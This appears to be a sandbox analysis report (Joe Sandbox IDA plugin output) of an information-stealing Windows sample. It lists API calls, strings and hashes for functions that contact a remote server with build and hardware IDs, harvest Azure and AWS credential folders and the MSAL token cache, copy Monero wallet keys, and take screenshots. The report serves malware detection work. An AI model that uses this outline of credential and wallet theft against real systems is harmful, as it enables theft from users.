                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F3EAC
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F3EC7
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F400D
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F4048
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F406C
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003101E9,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 002F42BD
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F42D6
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F42E7
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F42FE
                                      • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 002F434A
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4355
                                      • InternetCloseHandle.WININET(?), ref: 002F4367
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                      • String ID: "$------$build_id$hwid
                                      • API String ID: 1585128682-50533134
                                      • Opcode ID: c9e87b40f41453ca4e85ee456a0d7e26cb565f98182b8c2d08a7ce5adfb01ac0
                                      • Instruction ID: 66d5c86c308b6a05fdfd7308c52d057b0f4e6117791a434c22f45abf145b38e3
                                      • Opcode Fuzzy Hash: c9e87b40f41453ca4e85ee456a0d7e26cb565f98182b8c2d08a7ce5adfb01ac0
                                      • Instruction Fuzzy Hash: E3F1307292010CBEDB59EBA0DD92EFEB378AF14780F504179F61262191EF706A19CF64
                                      Function 00309C90 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 74stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(0030BE14,?,?,?,0030BE14,?), ref: 00309C99
                                      • StrCmpCA.SHLWAPI(?,0031457C,?,0030BE14,?), ref: 00309CCB
                                      • StrCmpCA.SHLWAPI(?,.zip,?,0030BE14,?), ref: 00309CDD
                                      • StrCmpCA.SHLWAPI(?,.zoo,?,0030BE14,?), ref: 00309CE9
                                      • StrCmpCA.SHLWAPI(?,.arc,?,0030BE14,?), ref: 00309CF5
                                      • StrCmpCA.SHLWAPI(?,.lzh,?,0030BE14,?), ref: 00309D01
                                      • StrCmpCA.SHLWAPI(?,.arj,?,0030BE14,?), ref: 00309D0D
                                      • StrCmpCA.SHLWAPI(?,.gz,?,0030BE14,?), ref: 00309D19
                                      • StrCmpCA.SHLWAPI(?,.tgz,?,0030BE14,?), ref: 00309D25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                      • API String ID: 1659193697-51310709
                                      • Opcode ID: 79426d158269ac1a75057216027e42b1f439b61e721425fa445d98d74e7f4f49
                                      • Instruction ID: a5ebce8f0711d07bdd9195f916b5af77593c1a6db297e201cff3360823cb1914
                                      • Opcode Fuzzy Hash: 79426d158269ac1a75057216027e42b1f439b61e721425fa445d98d74e7f4f49
                                      • Instruction Fuzzy Hash: EF01E563A8362621FE2BB27D5D10FEF66CD4D87B9070B0122E514A50C2DB45C9C386B1
                                      Function 00306350 Relevance: 27.1, APIs: 10, Strings: 8, Instructions: 121stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00306367
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306389
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 003063A3
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305EBC
                                        • Part of subcall function 00305EA0: FindFirstFileA.KERNEL32(?,?), ref: 00305ED3
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101DC), ref: 00305EFC
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101D8), ref: 00305F16
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F3B
                                        • Part of subcall function 00305EA0: StrCmpCA.SHLWAPI(?,003101E9), ref: 00305F4A
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F67
                                        • Part of subcall function 00305EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00305F97
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,02F431A8), ref: 00305FC3
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,003101E0), ref: 00305FD5
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,?), ref: 00305FE3
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,003101E0), ref: 00305FF5
                                        • Part of subcall function 00305EA0: lstrcat.KERNEL32(?,?), ref: 00306009
                                      • memset.MSVCRT ref: 003063E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306408
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00306422
                                        • Part of subcall function 00305EA0: wsprintfA.USER32 ref: 00305F86
                                        • Part of subcall function 00305EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003060AA
                                        • Part of subcall function 00305EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003101E9), ref: 00306119
                                      • memset.MSVCRT ref: 0030645F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00306487
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003064A1
                                        • Part of subcall function 00305EA0: FindNextFileA.KERNEL32(?,?), ref: 00306160
                                        • Part of subcall function 00305EA0: FindClose.KERNEL32(?), ref: 00306172
                                      • memset.MSVCRT ref: 003064DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 2861501092-3645552435
                                      • Opcode ID: fee4a4b50fcfbf4a995747216a8058b920666d30c8a7304c91875d175a133198
                                      • Instruction ID: c70212c9f41fdcd744031b1caa33125f525e0018f9a76217cbd77dc3b859ae78
                                      • Opcode Fuzzy Hash: fee4a4b50fcfbf4a995747216a8058b920666d30c8a7304c91875d175a133198
                                      • Instruction Fuzzy Hash: 04418172E5020C76DB2AE7B0CC57FED77286F18740F444968F715661C1EAB0A7988F61
                                      Function 00302000 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 295stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • strtok_s.MSVCRT ref: 0030202B
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003020C1
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003020FA
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0030213C
                                      • lstrcpy.KERNEL32(?,00000000), ref: 0030217E
                                      • lstrcpy.KERNEL32(?,00000000), ref: 003021BF
                                      • StrCmpCA.SHLWAPI(00000000,true,?), ref: 00302322
                                      • strtok_s.MSVCRT ref: 003023AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$strtok_s
                                      • String ID: false$true
                                      • API String ID: 2610293679-2658103896
                                      • Opcode ID: 6e611884bd4ea15bd474921b481719443ce217eec09449e077605c2bc9953c25
                                      • Instruction ID: cf34e1bc16bdb887f6f41df8b80c7849625fe15df4cddee6118126a0e067b96e
                                      • Opcode Fuzzy Hash: 6e611884bd4ea15bd474921b481719443ce217eec09449e077605c2bc9953c25
                                      • Instruction Fuzzy Hash: 43A1EBB2D11208ABDB59EBB0DC55EEF737CAF54300F004568F51AA7282EB34A658CF60
                                      Function 002F1A30 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 180registrymemorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 002F1A48
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002F1A5E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F1A65
                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002F1A82
                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002F1A9C
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • RegCloseKey.ADVAPI32(?), ref: 002F1AA6
                                      • lstrcat.KERNEL32(?,00000000), ref: 002F1AB4
                                      • lstrlen.KERNEL32(?), ref: 002F1AC1
                                      • lstrcat.KERNEL32(?,.keys), ref: 002F1ADC
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 002F1BC6
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1C32
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileHeaplstrcat$AllocateCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlenmemset
                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                      • API String ID: 2769360516-218353709
                                      • Opcode ID: c05186b34a5114730c4dc94a6266bbbd15ff1476205e2c03fdaa21880a03f98e
                                      • Instruction ID: 21f566dfa8c0255ec4920e8364c0eb2d98e190f7351deaca59a770ad7e5609d5
                                      • Opcode Fuzzy Hash: c05186b34a5114730c4dc94a6266bbbd15ff1476205e2c03fdaa21880a03f98e
                                      • Instruction Fuzzy Hash: 8851437192010CABDB58EBA0DE56EFEB33CAF54780F404538F60662191EB74AA59CF61
                                      Function 003023F0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 134stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 53e3bc76cbd15782815e24053d321f7fd82aeccf7ccb11f640b50d0bbca06215
                                      • Instruction ID: 7ba6f7b00a2871caf35fc6936a9b1d3b1e233078b8b522eb762a5bbf3ff1b901
                                      • Opcode Fuzzy Hash: 53e3bc76cbd15782815e24053d321f7fd82aeccf7ccb11f640b50d0bbca06215
                                      • Instruction Fuzzy Hash: 4941C2B0E45B08AADB22AF749C6D997B7ACBF16749B104928F407E3081E770D2058B18
                                      Function 00301530 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00301592
                                      • GetDesktopWindow.USER32 ref: 0030159C
                                      • GetWindowRect.USER32(00000000,?), ref: 003015A9
                                      • SelectObject.GDI32(00000000,00000000), ref: 003015D5
                                      • GetHGlobalFromStream.COMBASE(?,?), ref: 00301651
                                      • GlobalLock.KERNEL32(?), ref: 0030165B
                                      • GlobalSize.KERNEL32(?), ref: 00301668
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
